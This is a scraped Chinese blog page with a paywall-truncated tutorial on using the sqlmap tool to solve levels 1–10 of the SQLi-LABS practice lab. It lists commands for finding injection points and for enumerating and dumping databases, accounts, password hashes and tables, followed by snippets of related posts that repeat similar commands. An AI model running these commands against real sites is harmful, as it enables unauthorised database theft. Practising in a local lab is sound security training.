sqlmap过SQLi-LABS靶场 1-10关

最新推荐文章于 2024-11-25 14:45:14 发布
最新推荐文章于 2024-11-25 14:45:14 发布
阅读量8.6k 收藏 91
点赞数 14
分类专栏: SQLmap SQL注入 靶场 文章标签: mysql sql 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_24030907/article/details/106541411
版权
本文介绍了如何使用sqlmap工具通过SQLi-LABS靶场的前10关。内容包括清除sqlmap缓存的方法、检测注入点、暴库、获取数据库信息、列出用户、密码、表和字段,以及调整风险等级和测试级别等操作。通过逐步指导,展示了sqlmap在实战中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

今天我们来用sqlmap去做SQLi-LABS靶场
首先来讲一下基础命令
1.清除sqlmap缓存:
第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容
第二个办法:sqlmap.py --purge
2.sqlmap -u 注入点 检测注入点是否可用
sqlmap -u 注入点 –batch 自动输入
暴库
sqlmap -u 注入点 –dbs //暴库
Web当前使用的数据库
sqlmap -u 注入点 –current-db //爆当前使用的库
Web数据库使用的账户
sqlmap -u 注入点 –current-user //当前使用的账户
列出sqlserver所有用户
sqlmap -u 注入点 –users // 列出所有使用过的账户
数据库账户与密码
sqlmap -u 注入点 –passwords //mysql的登录账户和密码
列出数据库中的表
sqlmap -u 注入点 -D 指定数据库名 –tables //(-D指定数据库名称)
列出表中字段
sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 –columns
爆字段内容
sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword” –dump (将结果导出)
–risk:风险等级,共有4个,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。

level:共有五个等级,默认为1,在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。

第一关
在这里插入图片描述
先准备sqlmap
找到注入的,进行最高等级的爆库,很顺利

sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" <
最低0.47元/天 解锁文章
sqlmap sqli-labs
u012922879的博客
08-26 3463
测试靶场:http://127.0.0.1/sqli-labs-master/Less-1/?id=5 sqlmap选项 目标:至少要选中一个参数 -u URL, –url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1“) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: ...
【史上最全sqlmapsqli-labs靶场教程】
DMXA的博客
10-15 6391
【史上最全sqlmapsqli-labs靶场教程】
sqli-labs靶场(21-30)
Fly_Mojito的博客
06-15 799
sqli-labs靶场(21-30)
最全sqlmap命令
gzy1616的博客
03-06 743
-search 搜索数据库名、表明、列名,需要与-D -T或-C 联用。--columns 在-D -T情况下输出表中所有列名。-C column 在-D -T情况下输出某列数据的值。--tables 在-D情况下输出库中所有表名。--file-dest 上传文件(指定目标机器路径)--file-write 上传文件(指定本地路径)
SQLmap使用方法,sqli-labs靶场
ZhangAweio的博客
04-10 604
SQL-map是一个非常强大的注入的工具,自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入,支持mysqlsql-service 等简单使用nmap进行查询数据。
sqlmapsqlilabs less 1-10
zzxyccxc的博客
04-13 823
2.用 sqlmap 工具注入完毕后,C 盘 AppData 文件夹下会有缓存文件夹,不删掉的话会影响 SQL 注入结果,可用sqlmap.py --purge清理缓存。1.在实际检测过程中,sqlmap 会不停的询问,需要手工输入Y/N来进行下一步操作,可以使用参数。less 02-less 09和上面一样,修改完url跑出表名即可。2.使用 --current-db 可以爆出当前数据库名。3.爆出security数据库下的所有表。4.爆出users表下的所有字段。1.爆出所有数据库名。
sqlmapsqli-labs-master以第一为例
yj959595的博客
07-08 823
先把需要用到的命令列一下,方便使用。 sqlmap -u 注入点 –dbs 暴库 sqlmap -u 注入点 –current-user 当前使用的账户
Sqli-labs靶场19[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 899
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
Sqli-labs靶场16[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 988
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场11[Sqli-labs-less-11]
m0_73615178的博客
02-24 1837
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场18[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1731
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqlmap学习,打靶sqli-labs.(1-19)
最新发布
shdbehdvd的博客
11-25 965
sqlmap学习日志.
sqli-labs第五附加sqlmap使用
告白的博客
07-05 1938
0x00 判断注入类型 首先还是像之前一样判断注入类型,字段长度以及错误回显等,在这一发现无论怎么输入函数,永远只显示相同画面,错误输入则不显示,从此判断出这里不在使用联合注入查询,因为数据库不会回显输出字符,输出结果只存在0和1,程序已经禁止了数据库信息的返回显示。这是我们就要尝试进行盲注,可以尝试布尔型盲注、报错注入、时间延迟型盲注。这类型手工注入工程量很大,所以建议大家使用sqlmap,直接利用工具进行注入。 0x01 手工注入 1.采用布尔型注入 使用left(database(),n)函数猜
Sqlmap使用(sqli-lab)
Mccc_li的博客
05-06 3804
1.get使用方法: 1.查看是否有注入点:sqlmap -u 网址 2.爆出数据库名:sqlmap -u 网址 --dbs 5.爆出数据库的表名:sqlmap -u 网址 -D security --tables 6.爆出数据库的列名:sqlmap -u 网址 -D security -T users --columns 7.dump出数据:sqlmap -u -D security -...
靶场教学使用sqlmap
逍遥小哥的博客
02-02 639
sqlmap -r 1.txt --batch --current-db (--current-db就是判断网站是什么数据库的,--batch是自动化执行交互,不需要用户交互了)sqlmap -r ss.txt --batch --is-dba 判断当前用户是不是管理员权限。sqlmap -r ss.txt --batch --privileges 获取数据库用户的权限。sqlmap -r ss.txt --batch --current-user 获取当前用户。
BT5下使用SQLMAP***演示
weixin_34220623的博客
02-21 303
BT5下使用SQLMAP***演示2012-08-28 10:06:49 来源:colgator's blog简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQLSQLMAP采用四种独...
Sqlmapsqli-lab上的一些使用
weixin_43570155的博客
08-19 1411
目录 1.get使用方法: 2.post使用方法: 3.header注入使用方法: 4.指定注入的位置: 5.盲注使用不接收http body: 6.设置多线程(可以设置的最大数量为10,默认为1): 7.预测输出: 8.持久连接: 9.指定数据库的探测 10.sqlmap脚本绕过(详细的脚本释) 11.强制设置无效值替换: 12.自定义载荷(payload)位置 13.sqlmay设置tamper脚本: 14.sqlmap设置具体的注入技术: 15.查看当前用户以及是否是dba用户 16.枚举dbms的
sqlmap的使用方法(含靶场
0nc3的博客
11-06 7948
0x00 sqlmap简介 Sqlmap的7种等级: 常用–leve 3 0x01 mysql数据库的注入 靶场地址:http://59.63.200.79:8003 查看数据库名 sqlmap -u "http://59.63.200.79:8003/?id=1" --dbs 查看表 sqlmap -u "http://59.63.200.79:8003/?id=1" -D maoshe...
sqlmap学习(sqli-labs为示例)
quan9i的博客
02-17 5233
文章目录前言sql-map部分指令- -is-dba- -current-D,-T,-C- -dump-v--batchget类型检测可注入类型获取数据库获取表获取列名获取字段信息post类型准备工作检测可注入类型破数据库方法一方法二破数据表方法一方法二获取列名方法一方法二获取字段信息方法一方法二 前言 由于python学的啥也不是,脚本写的也很不咋滴(不会写),因此来学习sqlmap的使用,本人只是小白,如果出现错误还请各位师傅多多指正。 sql-map部分指令 - -is-dba --is-dba判
sqlmapsqli-labs靶场第一
01-06
以下是使用sqlmapsqli-labs靶场第一的步骤: 1. 下载并安装sqlmap工具。你可以从官方网站下载sqlmap工具并按照说明进行安装。 2. 打开终端或命令提示符,并导航到sqlmap的安装目录。 3. 运行以下命令来检测目标网站是否存在SQL注入漏洞: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs ``` 这个命令将使用sqlmap工具对目标网站进行扫描,并尝试发现数据库。 4. 如果目标网站存在SQL注入漏洞,sqlmap将返回数据库的名称。你可以使用以下命令来获取数据库的名称: ```shell python sqlmap.py -u "http://127.0.0.1/sqli1/Less-1/?id=1" --level=5 --risk=3 --dbs --batch --dump ``` 这个命令将获取数据库的名称,并尝试获取数据库中的表和数据。 请注意,上述命令中的URL和参数可能需要根据你的实际情况进行修改。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值